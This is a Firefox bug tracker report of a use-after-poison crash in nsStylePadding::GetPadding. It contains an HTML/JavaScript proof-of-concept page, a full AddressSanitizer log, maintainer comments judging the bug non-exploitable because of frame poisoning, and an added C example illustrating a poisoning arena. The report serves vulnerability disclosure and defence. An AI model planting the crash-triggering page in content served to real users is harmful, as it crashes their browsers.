Status: Invalid
Closed: Feb 2017
Mozilla Firefox: use-after-poison in nsStylePadding::GetPadding
Project Member Reported by ifratric@google.com, Feb 17 2017
Mozilla bug tracker link: https://bugzilla.mozilla.org/show_bug.cgi?id=1340593

There is a use-after-poison issue in Firefox. The vulnerability was confirmed on the nightly ASan build. 

PoC:

=================================================================

<style>
* { padding: inherit; }
</style>
<script>
function go() {
  var s = menu.style;
  s.setProperty("scroll-snap-destination", "1px 63%");
  s.setProperty("padding-left", "66%");
  button.scrollBy({left: 60, top: -1});
  th.vAlign = "top";
  s.setProperty("animation-fill-mode", "forwards");
}
</script>
<body onload=go()>
<button id="button" hidden="hidden"></button>
<table>
<th id="th">foo</th>
<menu id="menu">
<menu>foo</menu>

=================================================================

ASan log:

=================================================================
==78996==ERROR: AddressSanitizer: use-after-poison on address 0x625000b05790 at pc 0x7efe7287f223 bp 0x7ffc444d1e00 sp 0x7ffc444d1df8
READ of size 1 at 0x625000b05790 thread T0
    #0 0x7efe7287f222 in ConvertsToLength /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43
    #1 0x7efe7287f222 in nsStylePadding::GetPadding(nsMargin&) const /home/worker/workspace/build/src/layout/style/nsStyleStruct.h:1070
    #2 0x7efe728899b9 in mozilla::SizeComputationInput::ComputePadding(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2921:25
    #3 0x7efe72872d9f in mozilla::SizeComputationInput::InitOffsets(mozilla::WritingMode, mozilla::LogicalSize const&, nsIAtom*, mozilla::SizeComputationInput::ReflowInputFlags, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2548:23
    #4 0x7efe72879162 in mozilla::ReflowInput::InitConstraints(nsPresContext*, mozilla::LogicalSize const&, nsMargin const*, nsMargin const*, nsIAtom*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:2226:5
    #5 0x7efe728712b4 in mozilla::ReflowInput::Init(nsPresContext*, mozilla::LogicalSize const*, nsMargin const*, nsMargin const*) /home/worker/workspace/build/src/layout/generic/ReflowInput.cpp:399:3
    #6 0x7efe728dde05 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:166:25
    #7 0x7efe728ddf90 in nsBlockReflowContext::ComputeCollapsedBStartMargin(mozilla::ReflowInput const&, nsCollapsingMargin*, nsIFrame*, bool*, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockReflowContext.cpp:175:17
    #8 0x7efe728d4fae in nsBlockFrame::ReflowBlockFrame(mozilla::BlockReflowInput&, nsLineList_iterator, bool*) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:3298:7
    #9 0x7efe728c9606 in ReflowLine /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2829:5
    #10 0x7efe728c9606 in nsBlockFrame::ReflowDirtyLines(mozilla::BlockReflowInput&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:2368
    #11 0x7efe728bfc92 in nsBlockFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:1237:3
    #12 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #13 0x7efe72921a52 in nsCanvasFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:711:5
    #14 0x7efe72923070 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, mozilla::WritingMode const&, mozilla::LogicalPoint const&, nsSize const&, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1028:3
    #15 0x7efe729c7e3a in nsHTMLScrollFrame::ReflowScrolledFrame(mozilla::ScrollReflowInput*, bool, bool, mozilla::ReflowOutput*, bool) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:552:3
    #16 0x7efe729c92b0 in nsHTMLScrollFrame::ReflowContents(mozilla::ScrollReflowInput*, mozilla::ReflowOutput const&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:664:3
    #17 0x7efe729ccadb in nsHTMLScrollFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/nsGfxScrollFrame.cpp:1039:3
    #18 0x7efe72933792 in nsContainerFrame::ReflowChild(nsIFrame*, nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, int, int, unsigned int, unsigned int&, nsOverflowContinuationTracker*) /home/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:1072:3
    #19 0x7efe728a5759 in mozilla::ViewportFrame::Reflow(nsPresContext*, mozilla::ReflowOutput&, mozilla::ReflowInput const&, unsigned int&) /home/worker/workspace/build/src/layout/generic/ViewportFrame.cpp:326:7
    #20 0x7efe726a64dc in mozilla::PresShell::DoReflow(nsIFrame*, bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9260:3
    #21 0x7efe726b9f44 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9433:24
    #22 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
    #23 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
    #24 0x7efe72634121 in nsRefreshDriver::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2203:5
    #25 0x7efe726295b0 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1842:7
    #26 0x7efe726339fa in nsRefreshDriver::FinishedWaitingForTransaction() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:2137:5
    #27 0x7efe6dd939a7 in mozilla::layers::ClientLayerManager::DidComposite(unsigned long, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/client/ClientLayerManager.cpp:495:5
    #28 0x7efe6de7cefb in mozilla::layers::CompositorBridgeChild::RecvDidComposite(unsigned long const&, unsigned long const&, mozilla::TimeStamp const&, mozilla::TimeStamp const&) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeChild.cpp:584:5
    #29 0x7efe6d1e3f71 in mozilla::layers::PCompositorBridgeChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PCompositorBridgeChild.cpp:1537:20
    #30 0x7efe6cba8fb0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1795:14
    #31 0x7efe6cba54ec in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1730:17
    #32 0x7efe6cba7b24 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1603:5
    #33 0x7efe6cba816e in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1636:5
    #34 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #35 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #36 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #37 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #38 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #39 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #40 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #41 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #42 0x7efe7575ac0c in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4470:10
    #43 0x7efe7575c708 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4647:8
    #44 0x7efe7575d9cc in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4738:16
    #45 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #46 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #47 0x7efe8714882f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #48 0x41c2e8 in _start (/home/ifratric/p0/latest/firefox/firefox+0x41c2e8)

0x625000b05790 is located 5776 bytes inside of 8192-byte region [0x625000b04100,0x625000b06100)
allocated by thread T0 here:
    #0 0x4b2d5b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x7efe84725a24 in PL_ArenaAllocate /home/worker/workspace/build/src/nsprpub/lib/ds/plarena.c:127:27
    #2 0x7efe72620fc1 in nsPresArena::Allocate(unsigned int, unsigned long) /home/worker/workspace/build/src/layout/base/nsPresArena.cpp:165:3
    #3 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsPresArena.h:65:12
    #4 0x7efe72513c24 in AllocateByObjectID /home/worker/workspace/build/src/layout/base/nsIPresShell.h:239
    #5 0x7efe72513c24 in operator new /home/worker/workspace/build/src/layout/style/nsRuleNode.h:152
    #6 0x7efe72513c24 in SetStyleData /home/worker/workspace/build/src/layout/style/nsRuleNode.h:303
    #7 0x7efe72513c24 in PropagateDependentBit /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:1904
    #8 0x7efe72513c24 in nsRuleNode::WalkRuleTree(nsStyleStructID, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsRuleNode.cpp:2566
    #9 0x7efe724e3f47 in nsStyleTextReset const* nsRuleNode::GetStyleTextReset<true>(nsStyleContext*) /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
    #10 0x7efe72582d6f in DoGetStyleTextReset<true> /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92:1
    #11 0x7efe72582d6f in StyleTextReset /home/worker/workspace/build/src/obj-firefox/layout/style/nsStyleStructList.h:92
    #12 0x7efe72582d6f in nsStyleContext::SetStyleBits() /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:706
    #13 0x7efe72582b76 in FinishConstruction /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:171:3
    #14 0x7efe72582b76 in nsStyleContext::nsStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, already_AddRefed<nsRuleNode>, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:129
    #15 0x7efe72591449 in NS_NewStyleContext(nsStyleContext*, nsIAtom*, mozilla::CSSPseudoElementType, nsRuleNode*, bool) /home/worker/workspace/build/src/layout/style/nsStyleContext.cpp:1368:5
    #16 0x7efe725b318f in nsStyleSet::GetContext(nsStyleContext*, nsRuleNode*, nsRuleNode*, nsIAtom*, mozilla::CSSPseudoElementType, mozilla::dom::Element*, unsigned int) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:943:14
    #17 0x7efe725b80d9 in nsStyleSet::ResolveStyleForInternal(mozilla::dom::Element*, nsStyleContext*, TreeMatchContext&, nsStyleSet::AnimationFlag) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1393:10
    #18 0x7efe725b78cc in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1403:10
    #19 0x7efe725b78cc in nsStyleSet::ResolveStyleFor(mozilla::dom::Element*, nsStyleContext*) /home/worker/workspace/build/src/layout/style/nsStyleSet.cpp:1350
    #20 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/layout/style/nsStyleSet.h:121:12
    #21 0x7efe7276d06c in ResolveStyleFor /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/StyleSetHandleInlines.h:85
    #22 0x7efe7276d06c in nsCSSFrameConstructor::MaybeRecreateFramesForElement(mozilla::dom::Element*) /home/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:9331
    #23 0x7efe726687fc in mozilla::GeckoRestyleManager::RestyleElement(mozilla::dom::Element*, nsIFrame*, nsChangeHint, mozilla::RestyleTracker&, nsRestyleHint, mozilla::RestyleHintData const&) /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:164:7
    #24 0x7efe726f57d3 in ProcessOneRestyle /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:95:5
    #25 0x7efe726f57d3 in mozilla::RestyleTracker::DoProcessRestyles() /home/worker/workspace/build/src/layout/base/RestyleTracker.cpp:262
    #26 0x7efe7266c9bf in ProcessRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/GeckoRestyleManager.h:386:7
    #27 0x7efe7266c9bf in mozilla::GeckoRestyleManager::ProcessPendingRestyles() /home/worker/workspace/build/src/layout/base/GeckoRestyleManager.cpp:505
    #28 0x7efe726b8bdb in ProcessPendingRestyles /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44:3
    #29 0x7efe726b8bdb in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4197
    #30 0x7efe726a7e80 in FlushPendingNotifications /home/worker/workspace/build/src/layout/base/PresShell.cpp:4073:3
    #31 0x7efe726a7e80 in HandlePostedReflowCallbacks /home/worker/workspace/build/src/layout/base/PresShell.cpp:4041
    #32 0x7efe726a7e80 in mozilla::PresShell::DidDoReflow(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9088
    #33 0x7efe726ba0e9 in mozilla::PresShell::ProcessReflowCommands(bool) /home/worker/workspace/build/src/layout/base/PresShell.cpp:9445:7
    #34 0x7efe726b8de4 in mozilla::PresShell::FlushPendingNotifications(mozilla::ChangesToFlush) /home/worker/workspace/build/src/layout/base/PresShell.cpp:4234:11
    #35 0x7efe7262a9d4 in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1915:9
    #36 0x7efe72638d25 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:305:7
    #37 0x7efe726389e2 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:326:5
    #38 0x7efe7263b063 in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:722:5
    #39 0x7efe7263b063 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:631
    #40 0x7efe72636157 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::ParentProcessVsyncNotifier::Run() /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:508:9
    #41 0x7efe6bd9ab89 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #42 0x7efe6bd97480 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #43 0x7efe6cbb0ebf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #44 0x7efe6cb22028 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #45 0x7efe6cb22028 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #46 0x7efe6cb22028 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #47 0x7efe71f5a82f in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #48 0x7efe7559d051 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19

SUMMARY: AddressSanitizer: use-after-poison /home/worker/workspace/build/src/obj-firefox/dist/include/nsStyleCoord.h:355:43 in ConvertsToLength
Shadow bytes around the buggy address:
  0x0c4a80158aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c4a80158af0: 00 00[f7]f7 f7 f7 f7 00 00 00 00 00 00 00 00 00
  0x0c4a80158b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a80158b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==78996==ABORTING


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member Comment 1 by ifratric@google.com, Feb 21 2017
This bug is likely non-exploitable due to Firefox frame poisoning.
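The comment above rests on Gecko's frame poisoning: the presentation arena (nsPresArena) overwrites freed objects with a poison value and, in ASan builds, marks the slot as user-poisoned, which is why the log reports a use-after-poison with shadow byte f7 ("Poisoned by user") instead of a plain use-after-free. The arena below is an added illustration of that defensive technique, written for this page; it is not Mozilla's code. The slot size, the `0xE5` fill byte and all `poison_arena_*` names are this example's own choices (Gecko fills with `mozPoisonValue()`, an address that cannot be dereferenced). It compiles with or without `-fsanitize=address`; under ASan the runtime's own poison state is consulted, otherwise the fill pattern is.

```c
/* Added example, not Firefox code: a fixed-size arena with frame-poisoning
 * semantics. A stale pointer into a freed slot reads a deterministic pattern
 * in a normal build and aborts with "use-after-poison" under ASan, so the
 * dangling read can neither observe nor act on attacker-influenced data. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#if defined(__has_feature)
#  if __has_feature(address_sanitizer)
#    define POISON_ARENA_ASAN 1
#  endif
#endif
#if defined(__SANITIZE_ADDRESS__)
#  define POISON_ARENA_ASAN 1
#endif

#ifdef POISON_ARENA_ASAN
#  include <sanitizer/asan_interface.h>
#else
/* Non-ASan build: the shadow-memory hooks are no-ops; the byte fill remains. */
#  define ASAN_POISON_MEMORY_REGION(p, n)   ((void)(p), (void)(n))
#  define ASAN_UNPOISON_MEMORY_REGION(p, n) ((void)(p), (void)(n))
#endif

#define SLOT_SIZE   64     /* one object-size bucket, like an arena free list */
#define SLOT_COUNT  8
#define POISON_BYTE 0xE5   /* constructed pattern; Gecko uses mozPoisonValue() */

typedef struct {
    uint8_t storage[SLOT_COUNT][SLOT_SIZE];
    void   *free_stack[SLOT_COUNT];  /* freed slots tracked outside the slots,
                                        so poisoned memory is never written */
    size_t  free_top;
    size_t  next_unused;             /* slots never handed out yet */
} poison_arena;

poison_arena *poison_arena_new(void) {
    poison_arena *a = calloc(1, sizeof *a);
    if (a) ASAN_POISON_MEMORY_REGION(a->storage, sizeof a->storage);
    return a;                        /* every slot starts inaccessible */
}

void poison_arena_destroy(poison_arena *a) {
    if (!a) return;
    ASAN_UNPOISON_MEMORY_REGION(a->storage, sizeof a->storage);
    free(a);
}

void *poison_arena_alloc(poison_arena *a) {
    void *p;
    if (a->free_top > 0)
        p = a->free_stack[--a->free_top];      /* LIFO reuse of freed slots */
    else if (a->next_unused < SLOT_COUNT)
        p = a->storage[a->next_unused++];
    else
        return NULL;                           /* arena exhausted */
    ASAN_UNPOISON_MEMORY_REGION(p, SLOT_SIZE); /* open the slot up first */
    memset(p, 0, SLOT_SIZE);
    return p;
}

void poison_arena_free(poison_arena *a, void *p) {
    memset(p, POISON_BYTE, SLOT_SIZE);         /* overwrite the dead object */
    ASAN_POISON_MEMORY_REGION(p, SLOT_SIZE);   /* then make it off limits */
    a->free_stack[a->free_top++] = p;
}

/* Is the slot in its freed, poisoned state? Under ASan ask the runtime
 * (reading the bytes would abort); otherwise inspect the fill pattern. */
int poison_arena_slot_is_poisoned(const void *p) {
#ifdef POISON_ARENA_ASAN
    return __asan_address_is_poisoned(p);
#else
    const uint8_t *b = p;
    for (size_t i = 0; i < SLOT_SIZE; i++)
        if (b[i] != POISON_BYTE) return 0;
    return 1;
#endif
}

/* The lifecycle the report exercises: allocate, free, then touch the object
 * through a stale pointer. Returns 1 when the stale slot is poisoned and the
 * same slot later comes back clean through the free list. */
int poison_arena_demo(void) {
    poison_arena *arena = poison_arena_new();
    if (!arena) return 0;
    int ok = 0;
    uint8_t *obj = poison_arena_alloc(arena);
    if (obj) {
        obj[0] = 0x41;                         /* live object data */
        uint8_t *stale = obj;                  /* dangling copy of the pointer */
        poison_arena_free(arena, obj);
        int poisoned = poison_arena_slot_is_poisoned(stale);
        uint8_t *again = poison_arena_alloc(arena);
        ok = poisoned && again == stale && again[0] == 0;
    }
    poison_arena_destroy(arena);
    return ok;
}

/* Failure mode: a full arena refuses rather than handing out a live slot. */
int poison_arena_exhaustion_returns_null(void) {
    poison_arena *arena = poison_arena_new();
    if (!arena) return 0;
    for (size_t i = 0; i < SLOT_COUNT; i++)
        if (!poison_arena_alloc(arena)) { poison_arena_destroy(arena); return 0; }
    int ok = poison_arena_alloc(arena) == NULL;
    poison_arena_destroy(arena);
    return ok;
}

int main(void) {
    return (poison_arena_demo() && poison_arena_exhaustion_returns_null()) ? 0 : 1;
}
```

Built with `-fsanitize=address`, a plain `stale[0]` read after `poison_arena_free` produces the same "use-after-poison ... Poisoned by user: f7" report seen in the log above; without the sanitizer the read returns `0xE5` every time, which is the property the comment relies on when calling the bug non-exploitable.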
Project Member Comment 2 by ifratric@google.com, Feb 28 2017
Labels: -Restrict-View-Commit
Status: Invalid
Given that the issue is nonexploitable, Mozilla has derestricted their bug and won't be releasing an advisory. Marking this bug as "invalid" and derestricting.